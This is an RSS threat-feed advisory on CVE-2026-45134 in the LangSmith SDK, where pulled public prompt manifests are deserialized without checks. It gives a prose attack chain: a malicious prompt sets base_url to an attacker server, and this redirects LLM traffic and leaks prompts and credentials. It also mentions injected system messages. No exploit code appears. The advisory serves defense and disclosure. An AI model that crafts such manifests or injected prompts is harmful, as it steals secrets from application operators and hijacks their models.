<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>Langchain — CraftedSignal Threat Feed</title><link>https://feed.craftedsignal.io/products/langchain/</link><description>Trending threats, MITRE ATT&amp;CK coverage, and detection metadata. Fed continuously.</description><generator>Hugo</generator><language>en</language><managingEditor>hello@craftedsignal.io</managingEditor><webMaster>hello@craftedsignal.io</webMaster><lastBuildDate>Wed, 13 May 2026 15:33:02 +0000</lastBuildDate><atom:link href="https://feed.craftedsignal.io/products/langchain/feed.xml" rel="self" type="application/rss+xml"/><item><title>LangSmith SDK Untrusted Manifest Deserialization Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2026-05-langsmith-deserialization/</link><pubDate>Wed, 13 May 2026 15:33:02 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-05-langsmith-deserialization/</guid><description>The LangSmith SDK is vulnerable to untrusted manifest deserialization when pulling public prompts via `pull_prompt`, potentially leading to SSRF, prompt injection, or sensitive data exposure; CVE-2026-45134.</description><content:encoded><![CDATA[<p>The LangSmith SDK is susceptible to a deserialization vulnerability when fetching public prompts. Specifically, the <code>pull_prompt</code> and <code>pull_prompt_commit</code> methods in Python, and <code>pullPrompt</code> and <code>pullPromptCommit</code> in JS/TS, fetch and deserialize prompt manifests from the LangSmith Hub. These manifests can contain serialized LangChain objects and model configurations, effectively making them executable configuration. When pulling a public prompt using the <code>owner/name</code> identifier, the SDK doesn&rsquo;t adequately distinguish this from pulling a prompt within the caller&rsquo;s own organization, leading to potential security risks. An attacker publishing a malicious prompt to LangSmith Hub can affect applications that pull that prompt by <code>owner/name</code>. This vulnerability affects LangSmith SDK Python versions prior to 0.8.0 and JS/TS versions prior to 0.6.0, as well as langchain-classic &lt; 1.0.7 and langchain &lt; 0.3.30. This allows an attacker to control the behavior of applications using LangSmith.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker creates a malicious prompt manifest containing a serialized LangChain object with a modified <code>base_url</code> parameter pointing to an attacker-controlled server.</li>
<li>The attacker publishes this malicious prompt to the LangSmith Hub, making it available to the public.</li>
<li>A victim application calls <code>pull_prompt</code> (Python) or <code>pullPrompt</code> (JS/TS) using the <code>owner/name</code> identifier of the attacker&rsquo;s malicious prompt.</li>
<li>The LangSmith SDK fetches the malicious prompt manifest from the LangSmith Hub.</li>
<li>The SDK deserializes the manifest, instantiating the LangChain object with the attacker-supplied <code>base_url</code>.</li>
<li>The victim application sends requests to the configured LLM client. Due to the malicious <code>base_url</code>, these requests are redirected to the attacker-controlled server.</li>
<li>The attacker&rsquo;s server intercepts the redirected requests, potentially capturing prompt contents, system prompts, retrieved context, model parameters, provider credentials, or other secrets.</li>
<li>The attacker gains unauthorized access to sensitive information or manipulates the application&rsquo;s behavior.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability can lead to severe consequences, including Server-Side Request Forgery (SSRF), where outbound requests are redirected to attacker-controlled servers, potentially exposing sensitive information. Prompt injection and behavior manipulation are also possible by embedding attacker-controlled system messages or prompt templates. The impact extends to applications using vulnerable versions of LangSmith SDK, with the potential for data breaches and unauthorized access. This vulnerability is tracked as CVE-2026-45134 and has a high severity rating.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade to LangSmith SDK Python version 0.8.0 or later, or JS/TS version 0.6.0 or later, to address the vulnerability.</li>
<li>Explicitly acknowledge the trust boundary when pulling public prompts by passing <code>dangerously_pull_public_prompt=True</code> (Python) or <code>dangerouslyPullPublicPrompt: true</code> (JS/TS) to the <code>pull_prompt</code> or <code>pullPrompt</code> methods.</li>
<li>Review and validate the contents of public prompts before using them, especially those pulled using the <code>owner/name</code> identifier.</li>
<li>Avoid passing <code>secrets_from_env=True</code> (Python) when pulling untrusted prompts to prevent environment variable leakage during deserialization.</li>
<li>Treat prompts as executable configuration and apply thorough review and audit practices, especially within your own organization, as compromised API keys can lead to malicious prompt injection.</li>
<li>Deploy the Sigma rule &ldquo;Detect LangSmith Public Prompt Pull Opt-In&rdquo; to monitor for explicit opt-in to pulling public prompts, indicating a potential risk area.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>deserialization</category><category>ssrf</category><category>prompt-injection</category></item></channel></rss>